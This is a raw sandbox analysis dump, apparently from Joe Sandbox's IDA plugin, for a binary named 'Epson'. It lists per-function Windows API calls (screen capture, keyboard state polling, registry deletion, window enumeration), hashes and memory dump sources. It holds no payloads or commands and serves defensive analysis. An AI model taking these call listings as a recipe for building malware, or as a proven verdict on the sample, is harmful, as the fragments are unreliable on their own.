                                                                                                                                                                                                                                      • Instruction ID: 838de56092d5bfffb292fd787dee9be409dae7cd39dcbb84c12578516e1c91d7
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 58acce133ab23aeabf624c4f5e5f63d0d7b9675416fdf017737932efef1c22d8
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9DC1A031604242AFD710DF14C884F2ABBE6BF84318F18859DE9568B7A2CB35ED46DBD1
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetDC.USER32(00000000), ref: 00FD3035
                                                                                                                                                                                                                                      • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00FD3045
                                                                                                                                                                                                                                      • CreateCompatibleDC.GDI32(?), ref: 00FD3051
                                                                                                                                                                                                                                      • SelectObject.GDI32(00000000,?), ref: 00FD305E
                                                                                                                                                                                                                                      • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00FD30CA
                                                                                                                                                                                                                                      • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00FD3109
                                                                                                                                                                                                                                      • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 00FD312D
                                                                                                                                                                                                                                      • SelectObject.GDI32(?,?), ref: 00FD3135
                                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 00FD313E
                                                                                                                                                                                                                                      • DeleteDC.GDI32(?), ref: 00FD3145
                                                                                                                                                                                                                                      • ReleaseDC.USER32(00000000,?), ref: 00FD3150
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                                                                                                                                      • String ID: (
                                                                                                                                                                                                                                      • API String ID: 2598888154-3887548279
                                                                                                                                                                                                                                      • Opcode ID: a47de253b24619589edb989320eaa88517ed85d84160cbe34e3fa773b4a64ea6
                                                                                                                                                                                                                                      • Instruction ID: b95e71a36f313485179bd4e154e8ed9e7ec6bb8cc9947b631ce4a44897bcaac4
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a47de253b24619589edb989320eaa88517ed85d84160cbe34e3fa773b4a64ea6
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7661E275D00219EFCB04CFA4DC84EAEBBB6FF48310F24852AE655AB250D775A941DF90
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00F5249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00F524B0
                                                                                                                                                                                                                                      • GetSystemMetrics.USER32(0000000F), ref: 00FEA990
                                                                                                                                                                                                                                      • GetSystemMetrics.USER32(00000011), ref: 00FEA9A7
                                                                                                                                                                                                                                      • GetSystemMetrics.USER32(00000004), ref: 00FEA9B3
                                                                                                                                                                                                                                      • GetSystemMetrics.USER32(0000000F), ref: 00FEA9C9
                                                                                                                                                                                                                                      • MoveWindow.USER32(00000003,?,?,00000001,?,00000000,?,00000000,?,00000000), ref: 00FEAC15
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00FEAC33
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00FEAC54
                                                                                                                                                                                                                                      • ShowWindow.USER32(00000003,00000000), ref: 00FEAC73
                                                                                                                                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00FEAC95
                                                                                                                                                                                                                                      • DefDlgProcW.USER32(?,00000005,?), ref: 00FEACBB
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MetricsSystem$Window$MessageSend$InvalidateLongMoveProcRectShow
                                                                                                                                                                                                                                      • String ID: @
                                                                                                                                                                                                                                      • API String ID: 3962739598-2766056989
                                                                                                                                                                                                                                      • Opcode ID: c36de545752fff032717290d738bbf9859ffd98e85863db2509d59050fab8698
                                                                                                                                                                                                                                      • Instruction ID: 033ef05d667489bfc50e485ddebe37597ca716fe2749159d78c2f717de724580
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c36de545752fff032717290d738bbf9859ffd98e85863db2509d59050fab8698
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 41B18A31A00299DFCF14CF6AC9C47AE7BB2BF84710F188069ED459F295D774A980EB52
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetClassNameW.USER32(?,?,00000400), ref: 00FB52E6
                                                                                                                                                                                                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 00FB5328
                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 00FB5339
                                                                                                                                                                                                                                      • CharUpperBuffW.USER32(?,00000000), ref: 00FB5345
                                                                                                                                                                                                                                      • _wcsstr.LIBVCRUNTIME ref: 00FB537A
                                                                                                                                                                                                                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 00FB53B2
                                                                                                                                                                                                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 00FB53EB
                                                                                                                                                                                                                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 00FB5445
                                                                                                                                                                                                                                      • GetClassNameW.USER32(?,?,00000400), ref: 00FB5477
                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00FB54EF
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                                                                                                                                                                                                                      • String ID: ThumbnailClass
                                                                                                                                                                                                                                      • API String ID: 1311036022-1241985126
                                                                                                                                                                                                                                      • Opcode ID: a937be7f83cd56ecf3b62ea1d3ab76d33f55a7e3aa6e5422e929e2ff37cf6595
                                                                                                                                                                                                                                      • Instruction ID: e8ad66b63ef44cca8c24b96aa6cfb6b6d6684200455178d42863c80230494b27
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a937be7f83cd56ecf3b62ea1d3ab76d33f55a7e3aa6e5422e929e2ff37cf6595
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F9910371504B06AFD718DF25C890BEAB7E9FF00714F084519FA8A82190EB39ED55EF91
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00F5249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00F524B0
                                                                                                                                                                                                                                      • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00FE97B6
                                                                                                                                                                                                                                      • GetFocus.USER32 ref: 00FE97C6
                                                                                                                                                                                                                                      • GetDlgCtrlID.USER32(00000000), ref: 00FE97D1
                                                                                                                                                                                                                                      • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?), ref: 00FE9879
                                                                                                                                                                                                                                      • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00FE992B
                                                                                                                                                                                                                                      • GetMenuItemCount.USER32(?), ref: 00FE9948
                                                                                                                                                                                                                                      • GetMenuItemID.USER32(?,00000000), ref: 00FE9958
                                                                                                                                                                                                                                      • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00FE998A
                                                                                                                                                                                                                                      • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00FE99CC
                                                                                                                                                                                                                                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00FE99FD
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                                                                                                                                                                                                                                      • String ID: 0
                                                                                                                                                                                                                                      • API String ID: 1026556194-4108050209
                                                                                                                                                                                                                                      • Opcode ID: 050649a6e1a2e6a9c1c165038c0fe5a5df7cd908f5a8b78c310040083c9af3f5
                                                                                                                                                                                                                                      • Instruction ID: dcb6bcf8126daadfdded276900f2789ebd5d53cb68e96dd3700b33913fafe7de
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 050649a6e1a2e6a9c1c165038c0fe5a5df7cd908f5a8b78c310040083c9af3f5
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DF81CF719083819FD710CF26CC84A6B7BE8BF89364F04091DF98597291D7B4D905EBA2
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetMenuItemInfoW.USER32(010229C0,000000FF,00000000,00000030), ref: 00FBC973
                                                                                                                                                                                                                                      • SetMenuItemInfoW.USER32(010229C0,00000004,00000000,00000030), ref: 00FBC9A8
                                                                                                                                                                                                                                      • Sleep.KERNEL32(000001F4), ref: 00FBC9BA
                                                                                                                                                                                                                                      • GetMenuItemCount.USER32(?), ref: 00FBCA00
                                                                                                                                                                                                                                      • GetMenuItemID.USER32(?,00000000), ref: 00FBCA1D
                                                                                                                                                                                                                                      • GetMenuItemID.USER32(?,-00000001), ref: 00FBCA49
                                                                                                                                                                                                                                      • GetMenuItemID.USER32(?,?), ref: 00FBCA90
                                                                                                                                                                                                                                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00FBCAD6
                                                                                                                                                                                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00FBCAEB
                                                                                                                                                                                                                                      • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00FBCB0C
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ItemMenu$Info$CheckCountRadioSleep
                                                                                                                                                                                                                                      • String ID: 0
                                                                                                                                                                                                                                      • API String ID: 1460738036-4108050209
                                                                                                                                                                                                                                      • Opcode ID: 62f124d1f7a88502310a1660ea4869a26aeebf22a30d5378cec65ca9e78b869d
                                                                                                                                                                                                                                      • Instruction ID: 14d5393ff97f9a6d17030ae82a502f4df5ec4bcbda21e151f2c7735702baa78b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 62f124d1f7a88502310a1660ea4869a26aeebf22a30d5378cec65ca9e78b869d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FC61BE71A0024AAFDF21CFA5CC98AEF7BB8FB45358F144015E951A7281C739AD00EFA0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00FBE4D4
                                                                                                                                                                                                                                      • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00FBE4FA
                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 00FBE504
                                                                                                                                                                                                                                      • _wcsstr.LIBVCRUNTIME ref: 00FBE554
                                                                                                                                                                                                                                      • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00FBE570
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
                                                                                                                                                                                                                                      • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                                                                                                                                      • API String ID: 1939486746-1459072770
                                                                                                                                                                                                                                      • Opcode ID: d16d659f28a2d30a619f6a2df8ee6850818b1a57d0aeb7ee414615b45eea7f0e
                                                                                                                                                                                                                                      • Instruction ID: 4799c2101f8f2020a3500a5af39800384202745502b7526ba9cbe21c18fa4018
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d16d659f28a2d30a619f6a2df8ee6850818b1a57d0aeb7ee414615b45eea7f0e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3F412772A402187BDB10AB658C47EFF376CDF55720F14406AF904E6082FFB9DA01B6A6
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00FDD6C4
                                                                                                                                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 00FDD6ED
                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00FDD7A8
                                                                                                                                                                                                                                        • Part of subcall function 00FDD694: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00FDD70A
                                                                                                                                                                                                                                        • Part of subcall function 00FDD694: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 00FDD71D
                                                                                                                                                                                                                                        • Part of subcall function 00FDD694: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00FDD72F
                                                                                                                                                                                                                                        • Part of subcall function 00FDD694: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00FDD765
                                                                                                                                                                                                                                        • Part of subcall function 00FDD694: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00FDD788
                                                                                                                                                                                                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00FDD753
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                                                                                                                                                                                                      • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                                                                                                                      • API String ID: 2734957052-4033151799
                                                                                                                                                                                                                                      • Opcode ID: f7f4dd8b30afb91f913098c6f824a2804690090fc72ad6f410200212e8e88a21
                                                                                                                                                                                                                                      • Instruction ID: 9894cfebe52926170d74551163403962e507156b9df0c3bab69632bb3fda20fe
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f7f4dd8b30afb91f913098c6f824a2804690090fc72ad6f410200212e8e88a21
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C5318072D0112DBBDB219B90DCC8EFFBB7DEF45714F0400A6A905E6214D7349E45AAA0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • timeGetTime.WINMM ref: 00FBEFCB
                                                                                                                                                                                                                                        • Part of subcall function 00F6F215: timeGetTime.WINMM(?,?,00FBEFEB), ref: 00F6F219
                                                                                                                                                                                                                                      • Sleep.KERNEL32(0000000A), ref: 00FBEFF8
                                                                                                                                                                                                                                      • EnumThreadWindows.USER32(?,Function_0006EF7C,00000000), ref: 00FBF01C
                                                                                                                                                                                                                                      • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00FBF03E
                                                                                                                                                                                                                                      • SetActiveWindow.USER32 ref: 00FBF05D
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00FBF06B
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 00FBF08A
                                                                                                                                                                                                                                      • Sleep.KERNEL32(000000FA), ref: 00FBF095
                                                                                                                                                                                                                                      • IsWindow.USER32 ref: 00FBF0A1
                                                                                                                                                                                                                                      • EndDialog.USER32(00000000), ref: 00FBF0B2
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                                                                                                                                      • String ID: BUTTON
                                                                                                                                                                                                                                      • API String ID: 1194449130-3405671355
                                                                                                                                                                                                                                      • Opcode ID: df6412a570b63c086348cb66341280e8e6cc16e1bcacf04be9ae26337bb2cb51
                                                                                                                                                                                                                                      • Instruction ID: 5d8c3c30b53ede0574db4e00273fbfe58b30dcb136b56d6361235a7fe572ee88
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: df6412a570b63c086348cb66341280e8e6cc16e1bcacf04be9ae26337bb2cb51
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F721CF75500248AFE3307F61ECC9AA67BADFB4D794B144025F6428A266CB7A8C44BF11
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00F5B329: _wcslen.LIBCMT ref: 00F5B333
                                                                                                                                                                                                                                      • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00FBF374
                                                                                                                                                                                                                                      • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00FBF38A
                                                                                                                                                                                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00FBF39B
                                                                                                                                                                                                                                      • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00FBF3AD
                                                                                                                                                                                                                                      • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00FBF3BE
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: SendString$_wcslen
                                                                                                                                                                                                                                      • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                                                                                                                                      • API String ID: 2420728520-1007645807
                                                                                                                                                                                                                                      • Opcode ID: bcc8146269cce8d8d393615940023fa3eb1bfe7b71ec40e1ee6526b27b541a41
                                                                                                                                                                                                                                      • Instruction ID: 2076c769122a578ade44263b3baee3cc56e961e70276a381f7e1ef8c8d5593e0
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bcc8146269cce8d8d393615940023fa3eb1bfe7b71ec40e1ee6526b27b541a41
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 16110231A9025939D720B367CC4AEFF7ABCEBC2B00F40042DB901EA0D5EAA41D0DD9B0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetKeyboardState.USER32(?), ref: 00FBA9D9
                                                                                                                                                                                                                                      • SetKeyboardState.USER32(?), ref: 00FBAA44
                                                                                                                                                                                                                                      • GetAsyncKeyState.USER32(000000A0), ref: 00FBAA64
                                                                                                                                                                                                                                      • GetKeyState.USER32(000000A0), ref: 00FBAA7B
                                                                                                                                                                                                                                      • GetAsyncKeyState.USER32(000000A1), ref: 00FBAAAA
                                                                                                                                                                                                                                      • GetKeyState.USER32(000000A1), ref: 00FBAABB
                                                                                                                                                                                                                                      • GetAsyncKeyState.USER32(00000011), ref: 00FBAAE7
                                                                                                                                                                                                                                      • GetKeyState.USER32(00000011), ref: 00FBAAF5
                                                                                                                                                                                                                                      • GetAsyncKeyState.USER32(00000012), ref: 00FBAB1E
                                                                                                                                                                                                                                      • GetKeyState.USER32(00000012), ref: 00FBAB2C
                                                                                                                                                                                                                                      • GetAsyncKeyState.USER32(0000005B), ref: 00FBAB55
                                                                                                                                                                                                                                      • GetKeyState.USER32(0000005B), ref: 00FBAB63
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: State$Async$Keyboard
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 541375521-0
                                                                                                                                                                                                                                      • Opcode ID: cedf85cac4e06a8fc2193ece75d1000c84977ce64e8979e8ea6268d3d37a5da1
                                                                                                                                                                                                                                      • Instruction ID: 35b87930b7746c4a2951f6b3dfcfa45c82b58f6913b6f55ea72267c561a8667e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cedf85cac4e06a8fc2193ece75d1000c84977ce64e8979e8ea6268d3d37a5da1
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6C51E870E0478829FB35D7628850BEABFB59F01390F088599C5C25B5C2EA649B4CEF63
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000001), ref: 00FB6649
                                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 00FB6662
